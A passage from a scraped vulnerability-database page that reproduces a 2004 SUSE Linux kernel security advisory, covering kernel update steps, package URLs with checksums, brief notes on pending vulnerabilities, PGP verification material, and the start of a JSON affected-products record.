    rpm -Uhv --nodeps --force <K_FILE.RPM>
where <K_FILE.RPM> is the name of the rpm package that you downloaded.

Warning: After performing this step, your system will likely not be
         able to boot if the following steps have not been fully
         followed.


If you run SUSE LINUX 8.1 and haven't applied the kernel update
(SUSE-SA:2003:034), AND you are using the freeswan package, you also
need to update the freeswan rpm as a dependency as offered
by YOU (YaST Online Update). The package can be downloaded from
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/

**** Step 4: configuring and creating the initrd

The initrd is a ramdisk that is loaded into the memory of your
system together with the kernel boot image by the bootloader. The
kernel uses the content of this ramdisk to execute commands that must
be run before the kernel can mount its actual root filesystem. It is
usually used to initialize SCSI drivers or NIC drivers for diskless
operation.

The variable INITRD_MODULES in /etc/sysconfig/kernel determines
which kernel modules will be loaded in the initrd before the kernel
has mounted its actual root filesystem. The variable should contain
your SCSI adapter (if any) or filesystem driver modules.

With the installation of the new kernel, the initrd has to be
re-packed with the update kernel modules. Please run the command

  mk_initrd

as root to create a new init ramdisk (initrd) for your system. 
On SuSE Linux 8.1 and later, this is done automatically when the
RPM is installed.

**** Step 5: bootloader

If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there
are two options:
Depending on your software configuration, you have either the lilo
bootloader or the grub bootloader installed and initialized on your
system. 
The grub bootloader does not require any further actions to be
performed after the new kernel images have been moved in place by the
rpm Update command. 
If you have a lilo bootloader installed and initialized, then the lilo
program must be run as root. Use the command

  grep LOADER_TYPE /etc/sysconfig/bootloader

to find out which boot loader is configured. If it is lilo, then you
must run the lilo command as root. If grub is listed, then your system
does not require any bootloader initialization.

Warning: An improperly installed bootloader may render your system
         unbootable.

**** Step 6: reboot

If all of the steps above have been successfully completed on your
system, then the new kernel including the kernel modules and the
initrd should be ready to boot. The system needs to be rebooted for
the changes to become active. Please make sure that all steps have
completed, then reboot using the command
    shutdown -r now
or
    init 6

Your system should now shut down and reboot with the new kernel.


There is no workaround known.


Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement. 
Then, install the package using the command "rpm -Fhv file.rpm" to apply
the update. 
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.





x86 Platform:

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm
  800418d3dddf6d3b83925f562842205a
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm
  0cb990b159e10685bb29b76d312ddd25
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm
  7446bb70f52bce57a914066be4ed8e45
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm
  7446bb70f52bce57a914066be4ed8e45
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm
  ede031495ee19d8b6eca1873e7155332
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm
  620ef40226fec31a773397cf3051bf36
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm
  9b61b5a70b304f5554cb18a6bae5b5fd
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm
  227c85280ee17a66c8590fe1bb14c596
ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm
  895fee3033de0810ff1173ce8ee87936

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm
  48be395b96329909486ae3a5152348fa
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm
  4cd322b4f511d5fe4c483ed28a82097e
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm
  262e33cebf1b0d35fb6d3235c9ab8815
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm
  8d81370f90736b12aa71b9c744f6e0e2
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm
  bc59c838c84ba318dc4d24da08a3022e
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm
  f9586ba982e0398c3e48871955b661aa
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm
  18673b0bf347fe9557d4e67ca02000c0
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm
  71496daac44196b0e0a3836ee6a3b4ed
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm
  7c208e9e3f7be1a68c3c8457eb2cafc4
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm
  b77863c863aaf4b931bff263220e6ec9
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm
  bed7e964e22c5e5d2f5e7a5e3816dde4
ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm
  6b5137bf379fbfc861441151039575da

SUSE Linux 8.2:
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm
  50d261b44616f9145a0dc16df501a504
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm
  10095854c0bdae20991d90b822352e14
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm
  a2ef7cfb0e62ad955dda2b0574eb3150
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm
  1d2b0d0e2c7998685ed04c24e593b196
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm
  d8bf98c46ba5313db286d5706f7fb3b8
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm
  e13a7b4c2b185cfeb991c31607f79ccb
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm
  0e2f2cf20e7d7a20f3e50b245105df61
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm
  6cfac2914d3827ec562ff9d6be29c566
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm
  afd29843aa69d805ef5f25d39ecd0e7f
ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm
  098a1400a48404931acb8b3eb2e821fb

SUSE Linux 8.1:
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm
  3bdaa593d09a7cbff632a2c4446d5603
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm
  ba60d0b2b6d3bc9c38b4e8b3859e1586
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm
  ffa8983669004826a0cbedbe34dced76
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm
  25174fd007f5a39ee0342dd6f18f2eaa
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm
  10837fa561cd5104e55d48e46c837764
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm
  c37e8b87819602e77b14206affef00fa
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm
  7be68a677db5a65be1a46ec194b35497
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm
  8e4b7d5a6bb81da5a00971cdcc4ec641
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm
  d8ba1db81a9b517f867c970e4fc443a7
ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm
  96a0a9242d066083c7bff8e0f70b7bbe

SUSE Linux 8.0:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm
  ec1e53b3812c0c0bd3681435d69fb134
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm
  583164e52019ae090fd47e425c2a933e
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm
  9ac8983abef05697d75f3117e37e5f18
ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm
  4932c4d6a42fc9be02013f398ab5bb96
ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm
  b9de0731f9bbc4b016455a6d52cd8296
source rpm(s):
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm
  a73bacad80432c26e856c41338b154bd
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm
  782902cd14e7776db66bd61a12beee03
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm
  d71fa5cda488ae18f8d023cd8f28bb73
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm
  a360a9e6ed2db54f69e17db36f02614f
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm
  8017fd6ff8a6fc1a0660ab35ad174388



x86-64 Platform:

SUSE Linux 9.1:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm
  e2c53fd24991f739fd754c07f7aa8293
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm
  f4a69622b7628cdd662a4e39aa59b60e
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm
  e71adfb1fc662600eb11d3acf67c3dc3
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm
  f6a364879d1f2ae2cf854810d61be3ac
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm
  a0096d1fc067d89c9200ea3904713d59
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm
  bf6d0439cfc37b50b4f6822c3403a74f

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm
  17e008a737e5e95e71335e34fa7f86cf
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm
  ca742b550b1a503595b02cbfc9e0e481
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm
  8e0c16c42d1a89aa6a09be1dd575de47
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm
  58b1bf42b5661119d06a04888144707a
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm
  5103001136e39fca5a59f4cbde82822b
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm
  231c9e5e00f17df8cfd72d6c8a68d9cf

2) Pending vulnerabilities in SUSE Distributions and Workarounds:

- icecast
The icecast service is vulnerable to a remote denial-of-service
attack. Update packages will be available soon.

- sitecopy
The sitecopy package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- cadaver
The cadaver package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- OpenOffice_org
The OpenOffice_org package includes a vulnerable version
of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages
will be available soon.

- tripwire
A format string bug in tripwire can be exploited locally
to gain root permissions. 
New packages are available.

- postgresql
A buffer overflow in psqlODBC could be exploited to crash the
application using it. E.g. a PHP script that uses ODBC to access a
PostgreSQL database can be utilized to crash the surrounding Apache
web-server. Other parts of PostgreSQL are not affected. 
New packages are available.

- XDM/XFree86
This update resolves random listening to ports by XDM
that allows to connect via the XDMCP. SUSE LINUX 9.1
is affected only. 
New packages are available.

- mod_proxy
A buffer overflow can be triggered by malicious remote
servers that return a negative Content-Length value. 
This vulnerability can be used to execute commands remotely
New packages are available.

- freeswan
A bug in the certificate chain authentication code could allow an
attacker to authenticate any host against a FreeS/WAN server by
presenting specially crafted certificates wrapped in a PKCS#7 file. 
The packages are currently being tested and will be available soon.

- ipsec-tools
The racoon daemon which is responsible for handling IKE messages
fails to reject invalid or self-signed X.509 certificates which
allows for man-in-the-middle attacks on IPsec tunnels established
via racoon. 
The packages are currently being tested and will be available soon.

- less
This update fixes a possible symlink attack in lessopen.sh. The
attack can be executed by local users to overwrite arbitrary files
with the privileges of the user running less. 
New packages are available.

- libpng
This update adds a missing fix for CAN-2002-1363. 
New packages are available.

- pavuk
This update fixes a remotely exploitable buffer overflow in pavuk. 
Thanks to Ulf Harnhammar for reporting this to us. 
New packages are available.

- kdebase3
This update fixes a possible attack on tmp files created at the
first login of a user using KDE or at the first time running a
KDE application. This bug can be exploited locally to overwrite
arbitrary files with the privilege of the victim user. 
Just affects SUSE LINUX 9.1
New packages are available.

3) standard appendix: authenticity verification, additional information

  • Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers around the world. While this service is considered valuable and important to the free and open source software community, many users wish to be certain as to be the origin of the package and its content before installing the package. There are two independent verification methods that can be used to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package.

    1) execute the command md5sum after you have downloaded the file from a SUSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key security@suse.de), the checksums offer proof of the authenticity of the package. We recommend against subscribing to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig to verify the signature of the package, where is the filename of the rpm package that you have downloaded. Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed b) The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import the key that is used by SUSE in rpm packages for SUSE Linux by saving this announcement to a file ("announcement.txt") and running the command (do "su -" to be root): gpg --batch; gpg < announcement.txt | gpg --import SUSE Linux distributions version 7.1 and thereafter install the key "build@suse.de" upon installation or upgrade, provided that the package gpg is installed. The file containing the public key is placed at the top-level directory of the first CD (pubring.gpg) and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

  • SUSE runs two security mailing lists to which any interested party may subscribe:

    suse-security@suse.com - general/linux/SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an email to suse-security-subscribe@suse.com.

    suse-security-announce@suse.com - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an email to suse-security-announce-subscribe@suse.com.

    For general information or the frequently asked questions (faq) send mail to: suse-security-info@suse.com or suse-security-faq@suse.com respectively.

    ===================================================================== SUSE's security contact is security@suse.com or security@suse.de. The security@suse.de public key is listed below. =====================================================================


    The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, it is desired that the clear-text signature must show proof of the authenticity of the text. SUSE Linux AG makes no warranties of any kind whatsoever with respect to the information contained in this security advisory.

Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team security@suse.de pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key build@suse.de

-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

mQGiBDnu9IERBACT8Y35+2vv4MGVKiLEMOl9GdST6MCkYS3yEKeueNWc+z/0Kvff 4JctBsgs47tjmiI9sl0eHjm3gTR8rItXMN6sJEUHWzDP+Y0PFPboMvKx0FXl/A0d M+HFrruCgBlWt6FA+okRySQiliuI5phwqkXefl9AhkwR8xocQSVCFxcwvwCglVcO QliHu8jwRQHxlRE0tkwQQI0D+wfQwKdvhDplxHJ5nf7U8c/yE/vdvpN6lF0tmFrK XBUX+K7u4ifrZlQvj/81M4INjtXreqDiJtr99Rs6xa0ScZqITuZC4CWxJa9GynBE D3+D2t1V/f8l0smsuYoFOF7Ib49IkTdbtwAThlZp8bEhELBeGaPdNCcmfZ66rKUd G5sRA/9ovnc1krSQF2+sqB9/o7w5/q2qiyzwOSTnkjtBUVKn4zLUOf6aeBAoV6NM CC3Kj9aZHfA+ND0ehPaVGJgjaVNFhPi4x0e7BULdvgOoAqajLfvkURHAeSsxXIoE myW/xC1sBbDkDUIBSx5oej73XCZgnj/inphRqGpsb+1nKFvF+rQoU3VTRSBQYWNr YWdlIFNpZ25pbmcgS2V5IDxidWlsZEBzdXNlLmRlPohcBBMRAgAcBQI57vSBBQkD wmcABAsKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyl8sAJ98BgD40zw0GHJHIf6d NfnwI2PAsgCgjH1+PnYEl7TFjtZsqhezX7vZvYCIRgQQEQIABgUCOnBeUgAKCRCe QOMQAAqrpNzOAKCL512FZvv4VZx94TpbA9lxyoAejACeOO1HIbActAevk5MUBhNe LZa/qM2JARUDBRA6cGBvd7LmAD0l09kBATWnB/9An5vfiUUE1VQnt+T/EYklES3t XXaJJp9pHMa4fzFa8jPVtv5UBHGee3XoUNDVwM2OgSEISZxbzdXGnqIlcT08TzBU D9i579uifklLsnr35SJDZ6ram51/CWOnnaVhUzneOA9gTPSr+/fT3WeVnwJiQCQ3 0kNLWVXWATMnsnT486eAOlT6UNBPYQLpUprF5Yryk23pQUPAgJENDEqeU6iIO9Ot 1ZPtB0lniw+/xCi13D360o1tZDYOp0hHHJN3D3EN8C1yPqZd5CvvznYvB6bWBIpW cRgdn2DUVMmpU661jwqGlRz1F84JG/xe4jGuzgpJt9IXSzyohEJB6XG5+D0BiF0E ExECAB0FAjxqqTQFCQoAgrMFCwcKAwQDFQMCAxYCAQIXgAAKCRCoTtronIAKyp1f AJ9dR7saz2KPNwD3U+fy/0BDKXrYGACfbJ8fQcJqCBQxeHvt9yMPDVq0B0W5Ag0E Oe70khAIAISR0E3ozF/la+oNaRwxHLrCet30NgnxRROYhPaJB/Tu1FQokn2/Qld/ HZnh3TwhBIw1FqrhWBJ7491iAjLR9uPbdWJrn+A7t8kSkPaF3Z/6kyc5a8fas44h t5h+6HMBzoFCMAq2aBHQRFRNp9Mz1ZvoXXcI1lk1l8OqcUM/ovXbDfPcXsUVeTPT tGzcAi2jVl9hl3iwJKkyv/RLmcusdsi8YunbvWGFAF5GaagYQo7YlF6UaBQnYJTM 523AMgpPQtsKm9o/w9WdgXkgWhgkhZEeqUS3m5xNey1nLu9iMvq9M/iXnGz4sg6Q 2Y+GqZ+yAvNWjRRou3zSE7Bzg28MI4sAAwYH/2D71Xc5HPDgu87WnBFgmp8MpSr8 QnSs0wwPg3xEullGEocolSb2c0ctuSyeVnCttJMzkukL9TqyF4s/6XRstWirSWaw JxRLKH6Zjo/FaKsshYKf8gBkAaddvpl3pO0gmUYbqmpQ3xDEYlhCeieXS5MkockQ 1sj2xYdB1xO0ExzfiCiscUKjUFy+mdzUsUutafuZ+gbHog1CN/ccZCkxcBa5IFCH ORrNjq9pYWlrxsEn6ApsG7JJbM2besW1PkdEoxak74z1senh36m5jQvVjA3U4xq1 wwylxadmmJaJHzeiLfb7G1ZRjZTsB7fyYxqDzMVul6o9BSwO/1XsIAnV1uuITAQY EQIADAUCOe70kgUJA8JnAAAKCRCoTtronIAKyksiAJsFB3/77SkH3JlYOGrEe1Ol 0JdGwACeKTttgeVPFB+iGJdiwQlxasOfuXyITAQYEQIADAUCPGqpWQUJCgCCxwAK CRCoTtronIAKyofBAKCSZM2UFyta/fe9WgITK9I5hbxxtQCfX+0ar2CZmSknn3co SPihn1+OBNyZAQ0DNuEtBAAAAQgAoCRcd7SVZEFcumffyEwfLTcXQjhKzOahzxpo omuF+HIyU4AGq+SU8sTZ/1SsjhdzzrSAfv1lETACA+3SmLr5KV40Us1w0UC64cwt A46xowVq1vMlH2Lib+V/qr3b1hE67nMHjysECVx9Ob4gFuKNoR2eqnAaJvjnAT8J /LoUC20EdCHUqn6v+M9t/WZgC+WNR8cq69uDy3YQhDP/nIan6fm2uf2kSV9A7ZxE GrwsWl/WX5Q/sQqMWaU6r4az98X3z90/cN+eJJ3vwtA+rm+nxEvyev+jaLuOQBDf ebh/XA4FZ35xmi+spdiVeJH4F/ubaGlmj7+wDOF3suYAPSXT2QAFEbQlU3VTRSBT ZWN1cml0eSBUZWFtIDxzZWN1cml0eUBzdXNlLmRlPokBFQMFEDbhLUfkWLKHsco8 RQEBVw4H/1vIdiOLX/7hdzYaG9crQVIk3QwaB5eBbjvLEMvuCZHiY2COUg5QdmPQ 8SlWNZ6k4nu1BLcv2g/pymPUWP9fG4tuSnlUJDrWGm3nhyhAC9iudP2u1YQY37Gb B6NPVaZiYMnEb4QYFcqv5c/r2ghSXUTYk7etd6SW6WCOpEqizhx1cqDKNZnsI/1X 11pFcO2N7rc6byDBJ1T+cK+F1Ehan9XBt/shryJmv04nli5CXQMEbiqYYMOu8iaA 8AWRgXPCWqhyGhcVD3LRhUJXjUOdH4ZiHCXaoF3zVPxpeGKEQY8iBrDeDyB3wHmj qY9WCX6cmogGQRgYG6yJqDalLqrDOdmJARUDBRA24S0Ed7LmAD0l09kBAW04B/4p WH3f1vQn3i6/+SmDjGzUu2GWGq6Fsdwo2hVM2ym6CILeow/K9JfhdwGvY8LRxWRL hn09j2IJ9P7H1Yz3qDf10AX6V7YILHtchKT1dcngCkTLmDgC4rs1iAAl3f089sRG BafGPGKv2DQjHfR1LfRtbf0P7c09Tkej1MP8HtQMW9hPkBYeXcwbCjdrVGFOzqx+ AvvJDdT6a+oyRMTFlvmZ83UV5pgoyimgjhWnM1V4bFBYjPrtWMkdXJSUXbR6Q7Pi RZWCzGRzwbaxqpl3rK/YTCphOLwEMB27B4/fcqtBzgoMOiaZA0M5fFoo54KgRIh0 zinsSx2OrWgvSiLEXXYKiEYEEBECAAYFAjseYcMACgkQnkDjEAAKq6ROVACgjhDM /3KM+iFjs5QXsnd4oFPOnbkAnjYGa1J3em+bmV2aiCdYXdOuGn4ZiQCVAwUQN7c7 whaQN/7O/JIVAQEB+QP/cYblSAmPXxSFiaHWB+MiUNw8B6ozBLK0QcMQ2YcL6+Vl D+nSZP20+Ja2nfiKjnibCv5ss83yXoHkYk2Rsa8foz6Y7tHwuPiccvqnIC/c9Cvz dbIsdxpfsi0qWPfvX/jLMpXqqnPjdIZErgxpwujas1n9016PuXA8K3MJwVjCqSKI RgQQEQIABgUCOhpCpAAKCRDHUqoysN/3gCt7AJ9adNQMbmA1iSYcbhtgvx9ByLPI DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= =LRKC - -----END PGP PUBLIC KEY BLOCK-----


  • - | Roman Drahtm\xfcller draht@suse.de // "You don't need eyes to see, | SUSE Linux AG - Security Phone: // you need vision!" | N\xfcrnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |
  • - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux)

iQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy Bi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt OsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD jwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA iud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT WntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ== =24bz -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200412-0084",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "3.1"
      },
      {
        "model": "sunos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sun",
        "version": "5.8"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "7"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "gentoo",
        "version": "*"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8"
      },
      {
        "model": "email server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "3"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.1"
      },
      {
        "model": "sunos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sun",
        "version": "5.9"
      },
      {
        "model": "linux database server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux connectivity server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sun",
        "version": "9.0"
      },
      {
        "model": "linux office server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "*"
      },
      {
        "model": "linux firewall",
        "scope": null,
        "trust": 0.8,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "gentoo linux",
        "scope": null,
        "trust": 0.8,
        "vendor": "gentoo linux",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
